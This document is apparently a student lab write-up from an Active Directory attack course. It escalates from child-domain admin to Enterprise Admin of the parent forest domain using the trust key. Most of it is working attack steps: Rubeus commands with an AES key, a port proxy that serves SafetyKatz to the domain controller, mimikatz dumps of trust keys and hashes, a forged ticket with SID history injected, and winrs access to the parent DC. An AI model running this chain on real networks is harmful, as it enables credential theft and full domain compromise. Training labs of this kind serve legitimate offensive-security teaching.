Learning Object 18
Tasks
1 – Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using the domain trust key
Flag 29 [Student VM] – SID history injected to escalate to Enterprise Admins 🚩
Solutions
1 – Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using the domain trust key
We need the trust key for the trust between dollarcorp and moneycrop, which can be retrieved using Mimikatz or SafetyKatz.
Start a process with DA privileges. Run the below command from an elevated command prompt:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /pttRun the below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials:
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
mimikatz(commandline) # lsadump::evasive-trust /patch
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 4/18/2025 9:04:35 PM - CLEAR - 1a 5f 93 d7 72 ef 03 2a 0f e3 9c 22 ee 65 3f c2 bb 11 51 1d d0 3c 7a fc 91 05 79 cb 2e 27 43 11 67 a8 18 e0 24 0b aa c1 71 0f e4 dc 0c b3 66 84 79 c2 74 f6 b0 88 49 19 90 ea f3 0c 02 1e 59 97 3f aa 42 a9 66 cf 9d a8 bc a4 aa 98 b4 d4 29 c3 aa a8 5e 5a ae 0f 93 21 51 6d fd ff a8 2f da cd 8c 3c fc 4c 1d 2f 51 c4 2e 89 01 20 29 2d 9d c7 40 d5 c7 1d 19 3c 38 38 94 3f 5b 67 a6 e6 68 4b 74 a2 a3 0d 44 0c dd 62 45 e7 01 46 83 0b 15 1d af 5f 0c 81 1e b8 ac eb 6f f2 79 fd 1f db af df cc 28 72 3d 50 a0 e8 50 62 57 22 64 c8 de fe 55 ef 94 b8 1f 54 76 65 7e 8c 0a a4 1b f6 45 03 1f 78 9f 1c de cf 52 c9 34 d2 c9 a1 f9 63 23 43 7a 25 f0 1d a8 b8 9d 25 44 f3 f7 c9 4d e5 2f 88 f9 1d c5 b3 62 59 bf ba e9 ea 97 f5 fb bb a1 82 a2
* aes256_hmac 6ebf48c7d7ad99b143c9b6ad518396606a395a60dc4165e83233a1c0c5716412
* aes128_hmac 7217c5114ba08994c10edf30106e5ce8
* rc4_hmac_nt 5f8e757822d6f6f2977af2dc94135713
[ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 11:05:00 PM - CLEAR - 75 a4 95 49 95 c5 3d 16 51 d6 dd ea 1b 5e ef a4 e1 4a a4 f6 ad de 59 dd 44 23 8d f7 26 68 e6 4e 6f 47 4c c5 88 ac 28 82 44 2d c4 3d 93 5a 81 d4 1a 59 f5 19 c4 b7 c4 02 8e e6 b7 af 93 2a b9 e3 8d 6c 69 fa bf 89 f7 1b ed 62 7c cf 58 0c 39 9c 5c 81 7d aa 5c f9 83 c8 8e 99 0f 80 db 04 be 05 59 b9 17 23 14 c2 30 69 a5 97 45 98 29 18 bf da ee 67 4b 82 80 ba 46 03 78 ce 7a 25 ea 48 cb 07 c8 8e b4 f2 75 c4 45 47 6e 74 59 5d 95 7a 46 3a a8 87 27 9a 09 4f bd 0e 21 6a 01 a7 3e 6d 30 31 fc f0 e3 00 80 27 96 e6 95 d5 8a 60 71 22 f8 d8 6e 6f f9 5c 31 50 00 ee b6 d2 2f e7 82 97 aa 14 d0 32 07 8a 38 87 66 47 f6 33 3c 34 71 8f 7c f0 8c 79 30 84 35 6c 04 cd 06 fd ed 9f 4a 10 56 6d f1 4d b9 90 45 c8 25 41 a9 7f 15 a8 ea 5b a4 42
* aes256_hmac 1be6d20275db04c936e2280d803afaf58aca9aabe04664db9484c20206590a0a
* aes128_hmac ceb4bb60cc4546c039ca70454cf27321
* rc4_hmac_nt 9e01158873ab48589848840d3b4f5ba3
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 4/18/2025 9:02:53 PM - CLEAR - ac bd a9 e1 65 26 f5 3a 41 c9 e5 72 33 d1 f0 41 9b 84 d9 8f 35 01 a2 02 76 a0 79 2c a8 a0 82 19 6f d5 cf 43 94 cd df e0 21 c3 00 5b b3 cc b7 ac a1 f1 2e bf 74 91 7d f7 e4 ee 11 86 32 aa 0f 8d dc ce fb 3d 88 e8 12 1e 89 4e 24 05 ce 7f 42 bb dd ed e5 07 46 cc 12 2d b3 5c 06 e3 ca b0 9e 8e c0 b5 f3 77 29 12 86 68 b7 c8 15 04 65 49 04 da cf 0c 9d 52 3c df e5 c2 68 d8 a1 95 22 89 7d f5 4a 00 be 42 02 2d 24 42 8e 76 89 9b c6 05 f2 02 04 95 5d 21 55 a4 46 bc 80 26 b3 ef b8 66 80 9c f3 de 96 62 53 ec 41 d5 d9 7f 87 31 65 74 01 19 35 c9 f6 a8 5c 36 ef ea 70 27 aa b5 f2 2f 75 f1 37 9b d5 8e 94 94 36 e9 2f 3c a5 96 bc 4b ca 62 cd 7d ef c5 0c 78 2a d5 97 4b 46 74 5c 95 11 63 ee 06 8d f4 d7 e8 df c7 4a fe 61 2a 5e d5 f5 bd
* aes256_hmac 81bd8c045f76d05865b297d68a97a264e7293a2859cd90fbf72d288e44704f8e
* aes128_hmac 8791c8a4a72eb4cd025bbda1a1dbb925
* rc4_hmac_nt c3f0bd731f242a1c1e3d2f2409d2e2df
[Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 11:05:00 PM - CLEAR - f5 ec 63 70 27 4e 2d 3b c9 cf d2 5c aa 42 3f 9e 84 43 1f ad ef 68 6f c0 0e ca 08 9f ee 7e a5 98 15 ca 17 70 e9 ee a5 02 b3 50 f5 9c fe 29 2c c1 f4 96 d3 7b f0 21 62 6b eb 3b 54 bc a3 90 99 e1 d4 1a 1a 0b 97 f1 bf d5 78 da 7e d0 cb 61 77 03 c2 08 c7 9f 9a 86 64 7b a1 0b 98 3c ba 99 bf 14 83 ff c5 f9 37 cb 1a c2 a8 1c 28 85 be 07 93 11 cb cc 35 88 5c 34 e5 d9 a1 0f ad 32 f5 e8 11 07 42 14 be 76 c3 fe 3a 77 a8 04 4c 17 ff 93 19 d0 70 ec c2 c9 0d 00 3b 2d 32 d9 d5 cc 1e f2 e0 f6 46 56 f8 cf 9c 2c 51 d8 15 f9 cd 0c d2 10 92 a8 75 af 26 8c 05 05 64 d1 be 58 03 65 3f c3 ed cd 63 05 ca 20 08 b7 09 d8 22 41 e0 a0 f7 2b 71 b7 48 ae c5 23 5b 50 d4 bf 15 a0 d4 a0 37 7d f3 d4 e3 77 93 e9 21 28 71 3d ad 9c fd 23 ce 6c 00 5d
* aes256_hmac 8a1e8a22021baf33cf5c186b2b257cace73088402e11545ede9c112545b6c05f
* aes128_hmac f97130aff8d849fa56b61a80d77492b0
* rc4_hmac_nt e1ff686c5ac2880aaecb34a8c8db19ee
Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:10:07 PM - CLEAR - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
* aes256_hmac 0d13893ad9375052e55276afd3aa59eee6ac13ecbb34ec595551a22850e5a21f
* aes128_hmac 1f367d7f4a602f7db49b28e8954e38b3
* rc4_hmac_nt 10abed140ecd1d7926fd8ed52141a4a9
[ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:10:07 PM - CLEAR - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
* aes256_hmac 677e0e1d4b663a16d24f8b8463d23e21a4ee23d2dab509221bf3444a95902fa1
* aes128_hmac 54713b68042823a0d642e3c8b55f2bf3
* rc4_hmac_nt 10abed140ecd1d7926fd8ed52141a4a9
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:03:57 PM - CLEAR - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
* aes256_hmac d006160aeebee4bc4736932b02e2021e58e712bb614809a9e5d7a885c830ebf3
* aes128_hmac 99e79607dc6c200854a32f6421f80e6c
* rc4_hmac_nt f3f9994ce98686f98d1dd8b81ec8f2cc
[Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:03:57 PM - CLEAR - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
* aes256_hmac 391de5a8a239c71f684355e04665f636c4b412caf5b89d7d1940e06a5a47d101
* aes128_hmac d39fd719f0a4e95b7b2a5c39d1c7feb2
* rc4_hmac_nt f3f9994ce98686f98d1dd8b81ec8f2cc
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 5/18/2025 10:03:52 PM - CLEAR - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
* aes256_hmac b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
* aes128_hmac e0923c5d48609d5521de83fc02ec3e4b
* rc4_hmac_nt 348f49cf83691a35ea71980994f02170
[ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:03:52 PM - CLEAR - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
* aes256_hmac b0f0a55ada2dfc87111ddbdc4072a8cc8679f4a5f79242f6510c57df0a65c831
* aes128_hmac 65770a68dff396a49468fe35cbc98cbe
* rc4_hmac_nt 348f49cf83691a35ea71980994f02170
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 5/16/2025 9:04:55 PM - CLEAR - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
* aes256_hmac 3b0cc0612e0bed52b403f6048bc4cd86233bb75a2848aa6d24385e9b61fad2b1
* aes128_hmac 0c32942d43e18125da040ada11ee8d5e
* rc4_hmac_nt 4e8f18911392c26d05bc7044914a6d57
[Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/16/2025 9:04:55 PM - CLEAR - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
* aes256_hmac 7a4cd11bc3ce3f83c5788e7dfe1e9bdd5c0187e2a793f9134e3bc1241497f7fb
* aes128_hmac aaaba3a50e251cbafda5bf205e9dd7ec
* rc4_hmac_nt 4e8f18911392c26d05bc7044914a6d57Let’s Forge a ticket with SID History of Enterprise Admins. Run the below command into a new shell:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:5f8e757822d6f6f2977af2dc94135713 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
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 the base64 encoded ticket from above and use it in the following command:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:http/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt /ticket: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Once the ticket is injected, we can access mcorp-dc:
winrs -r:mcorp-dc.moneycorp.local cmd
Flag 29 [Student VM] – SID history injected to escalate to Enterprise Admins 🚩
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:5f8e757822d6f6f2977af2dc94135713 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrapSID history injected to escalate to Enterprise Admins in details to forge a ticket with SID History of Enterprise Admins is: S-1-5-21-335606122-960912869-XXXXXXXXXXXXXXXXXX